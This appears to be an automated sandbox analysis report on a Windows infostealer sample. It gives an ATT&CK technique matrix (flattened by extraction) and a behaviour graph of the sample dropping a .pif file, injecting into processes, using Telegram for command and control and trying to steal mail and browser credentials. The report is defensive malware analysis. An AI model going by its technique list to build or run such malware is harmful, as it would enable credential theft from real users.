          Source: Yara matchFile source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts
          11
          Native API
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services11
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules
          1
          Valid Accounts
          1
          Valid Accounts
          11
          Deobfuscate/Decode Files or Information
          1
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          Logon Script (Windows)1
          Access Token Manipulation
          3
          Obfuscated Files or Information
          Security Account Manager1
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
          Process Injection
          4
          Software Packing
          NTDS26
          System Information Discovery
          Distributed Component Object Model1
          Input Capture
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Timestomp
          LSA Secrets141
          Security Software Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials41
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
          Masquerading
          DCSync2
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Valid Accounts
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion
          Network Sniffing1
          Remote System Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
          Process Injection
          Input Capture11
          System Network Configuration Discovery
          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636869 Sample: y79a2l1FY5.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 29 reallyfreegeoip.org 2->29 31 api.telegram.org 2->31 33 2 other IPs or domains 2->33 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 53 13 other signatures 2->53 8 y79a2l1FY5.exe 6 2->8         started        signatures3 49 Tries to detect the country of the analysis system (by using the IP) 29->49 51 Uses the Telegram API (likely for C&C communication) 31->51 process4 file5 27 C:\Users\user\Links\dajivhqI.pif, PE32 8->27 dropped 55 Drops PE files with a suspicious file extension 8->55 57 Writes to foreign memory regions 8->57 59 Allocates memory in foreign processes 8->59 61 2 other signatures 8->61 12 dajivhqI.pif 15 2 8->12         started        16 cmd.exe 1 8->16         started        18 cmd.exe 1 8->18         started        signatures6 process7 dnsIp8 37 api.telegram.org 149.154.167.220, 443, 49684 TELEGRAMRU United Kingdom 12->37 39 checkip.dyndns.com 193.122.130.0, 49682, 80 ORACLE-BMC-31898US United States 12->39 41 reallyfreegeoip.org 104.21.48.1, 443, 49683 CLOUDFLARENETUS United States 12->41 63 Detected unpacking (changes PE section rights) 12->63 65 Detected unpacking (overwrites its own PE header) 12->65 67 Tries to steal Mail credentials (via file / registry access) 12->67 69 Tries to harvest and steal browser information (history, passwords, etc) 12->69 71 Uses ping.exe to sleep 16->71 73 Uses ping.exe to check the status of other devices and networks 16->73 20 conhost.exe 16->20         started        22 PING.EXE 1 18->22         started        25 conhost.exe 18->25         started        signatures9 process10 dnsIp11 35 127.0.0.1 unknown unknown 22->35

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.